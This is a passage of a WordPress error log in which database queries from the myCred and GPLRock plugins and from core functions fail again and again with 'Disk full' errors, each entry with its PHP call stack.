full (/tmp/#sql-temptable-ace7-707ce9-7753.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:13:04 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707cfb-52da.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:13:04 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707cfb-52dd.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:13:05 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707d1e-114d.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:13:06 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707d1e-1150.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:13:10 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707db1-253f4.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-admin/admin.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:13:10 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707db1-253f7.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-admin/admin.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:13:11 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707db1-253fe.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by do_action('install_plugins_featured'), WP_Hook->do_action, WP_Hook->apply_filters, install_dashboard, install_popular_tags, get_site_transient, delete_site_option, delete_network_option, delete_option [02-Apr-2026 18:13:11 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707db1-253ff.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by do_action('install_plugins_featured'), WP_Hook->do_action, WP_Hook->apply_filters, install_dashboard, install_popular_tags, get_site_transient, delete_site_option, delete_network_option, delete_option [02-Apr-2026 18:13:42 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-708131-c2c.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:13:42 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-708131-c2f.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, _register_theme_block_patterns, WP_Theme->get_block_patterns, WP_Theme->get_pattern_cache, get_site_transient, delete_site_option, delete_network_option, delete_option [02-Apr-2026 18:13:42 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-708131-c30.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, _register_theme_block_patterns, WP_Theme->get_block_patterns, WP_Theme->get_pattern_cache, get_site_transient, delete_site_option, delete_network_option, delete_option [02-Apr-2026 18:13:43 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-708131-c31.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:14:05 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-7083d0-3061c.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:14:05 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-7083d0-3061f.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:14:20 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-7085c0-cd4.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:14:20 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-7085c0-cd7.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:14:49 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-708986-25b67.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:14:49 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-708986-25b6a.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:14:49 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-708986-25b6c.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_postmeta` made by do_action('wp_ajax_heartbeat'), WP_Hook->do_action, WP_Hook->apply_filters, wp_ajax_heartbeat, apply_filters('heartbeat_received'), WP_Hook->apply_filters, wp_refresh_post_lock, wp_set_post_lock, update_post_meta, update_metadata [02-Apr-2026 18:15:03 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-708b75-28072.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:15:04 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-708b75-28075.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:15:05 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-708ba5-255b7.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:15:05 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-708ba5-255ba.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:15:20 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-708e2a-c611.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:15:21 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-708e2a-c614.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:15:43 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-709168-b38b.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:15:44 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-709168-b38e.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:16:06 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70943b-228f9.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:16:06 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70943b-228fc.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:16:21 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-709620-b38.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:16:21 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-709620-b3b.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:16:50 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-7099ba-1d239.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:16:51 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-7099ba-1d23c.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:16:51 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-7099ba-1d23e.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_postmeta` made by do_action('wp_ajax_heartbeat'), WP_Hook->do_action, WP_Hook->apply_filters, wp_ajax_heartbeat, apply_filters('heartbeat_received'), WP_Hook->apply_filters, wp_refresh_post_lock, wp_set_post_lock, update_post_meta, update_metadata [02-Apr-2026 18:17:04 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-709bbb-235d0.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:17:04 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-709bbb-235d3.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:17:06 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-709bd4-306b8.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:17:06 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-709bd4-306bb.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:17:45 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70a137-20d7e.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:17:45 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70a137-20d81.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:18:07 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70a459-e27.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:18:07 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70a459-e2a.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:18:22 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70a651-2fc67.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:18:22 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70a651-2fc6a.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:18:51 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70aa09-981a.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:18:51 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70aa09-981d.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:18:52 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70aa09-981f.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_postmeta` made by do_action('wp_ajax_heartbeat'), WP_Hook->do_action, WP_Hook->apply_filters, wp_ajax_heartbeat, apply_filters('heartbeat_received'), WP_Hook->apply_filters, wp_refresh_post_lock, wp_set_post_lock, update_post_meta, update_metadata [02-Apr-2026 18:19:05 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70ac00-beed.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:19:05 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70ac00-bef0.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:19:07 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70ac25-24f40.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:19:08 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70ac25-24f43.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:19:47 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70b207-daa.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:19:47 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70b207-dad.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:20:08 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70b53a-2713f.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), 